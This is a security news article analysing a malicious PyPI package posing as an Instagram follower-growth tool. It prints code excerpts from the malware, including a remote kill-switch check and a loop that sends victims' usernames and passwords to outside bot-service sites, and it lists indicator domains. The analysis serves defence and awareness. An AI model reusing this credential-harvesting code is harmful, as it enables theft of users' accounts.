Recent research by cybersecurity experts has unveiled a sophisticated malware campaign masquerading as Instagram growth tools. These malicious packages, primarily distributed via Python packages on open-source repositories like PyPI, lure users with promises of rapid follower increases and engagement boosts.
However, behind the innocent facade lies a credential harvesting operation with global reach. The malware, attributed to a threat actor known as “IMAD-213,” employs technical subterfuge such as remote kill switches and secret credential broadcasts to exploit Instagram users.
The malware, distributed under the name imad213, is cleverly packaged as a Python script. Its GitHub repository features a polished README and installation instructions, notably recommending “a temporary account for safety.”
This deceptive tip tricks users into believing they are taking a precaution, while in reality, they are encouraged to provide valid, albeit secondary, credentials.
Upon installation and execution, the script employs several mechanisms to ensure persistence and control:
1. Remote Kill Switch via Netlify
The script begins by establishing a remote connection to a control file hosted on Netlify:
pythondef check_initial_request():
url = "https://imad-213-imad21.netlify.app/pass.txt"
try:
response = requests.get(url)
if response.status_code == 200:
content = response.text.strip()
if content == "imad213":
print(f"{GREEN}INSTAGRAM-LOGIN{RESET}")
return True
else:
print(f"{RED}IMAD-213{RESET}")
return False
except Exception:
return False
This check not only verifies the authenticity of the script but allows the attacker to shut down the malware operation globally by changing a single file. This remote kill switch is a powerful mechanism for avoiding detection and law enforcement intervention.
2. Local Credential Storage and Social Engineering
Once cleared through the kill switch, the script prompts users for Instagram credentials, storing them in plaintext on the victim’s machine:
python# دالة لحفظ بيانات الحساب في ملف (Function to save account data in file)
def save_credentials(username, password):
with open("credentials.txt", "w") as file:
file.write(f"{username}\n{password}")
print("Credentials saved successfully.")
Local storage further convinces users of the script’s legitimacy, obscuring its nefarious intent.
3. Credential Broadcast and Bot Service Coordination
The true danger emerges when the script unbeknownst to the user submits the stolen credentials to a network of at least ten third-party Instagram bot services. The script sends the login information via POST requests to each bot service, which masquerade as legitimate growth tools. These sites often display transparent disclaimers, but in reality, they harvest the credentials for later abuse.
An example of the credential transmission code:
pythonlogin_data = {
"username": username, # Your actual Instagram username
"password": password, # Your actual Instagram password
"userid": "",
"antiForgeryToken": "5e65770c2420a986097445ab74b0e24b"
}
session = requests.Session()
for login_url in bot_service_urls: # bot_service_urls contains all target URLs
response = session.post(login_url, headers=headers, data=login_data)
Among the targeted services are:
Analysis of WHOIS data and infrastructure reveals that these domains are operated from the same Turkish registrar, share Cloudflare protection, and were registered within days of each other, suggesting a coordinated attack campaign.
Instagram’s massive user base exceeding 2 billion active users makes it an attractive target for such scams.
The malware’s technical sophistication, including its use of legitimate hosting services for command and control, demonstrates a growing trend toward resilient and distributed attack infrastructure. Security analysts highlight several concerning developments:
Users who fall victim to these scams face immediate account compromise, potential illegal use of their personal data, and crucially violations of Instagram’s Community Guidelines, which can result in permanent bans or shadowbanning.
Furthermore, password reuse across different services magnifies the risk, potentially leading to identity theft and broader cybercrime.
Cybersecurity teams recommend the following proactive measures:
Platforms like Socket AI Scanner provide automated risk detection for open-source packages, helping developers identify malicious behavior before it enters production environments.
The emergence of these credential-harvesting Instagram growth services underscores the ongoing arms race between cybercriminals and security professionals.
Attackers are leveraging legitimate infrastructure and social engineering to outmaneuver traditional defenses, making user vigilance and advanced security tools vital in protecting digital identities.
As threat actors continue to evolve their tactics, collaboration between security researchers, platform operators, and end users will be essential in mitigating these risks and safeguarding the integrity of online communities.
im_ad__213 or IMAD-213madmadimado59@gmail[.]comhttps://github[.]com/imadoo27/imad-213-imad21.netlify[.]app/pass.txtinstagram[.]com/nasreddin_imadtakipcimx[.]nettakipcizen[.]combigtakip[.]nettakip88[.]comtakipciking[.]nettakipcigen[.]comtakipcikrali[.]comtakipcitime[.]netinstamoda[.]orgcredentials.txt (plaintext storage)5e65770c2420a986097445ab74b0e24bPortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…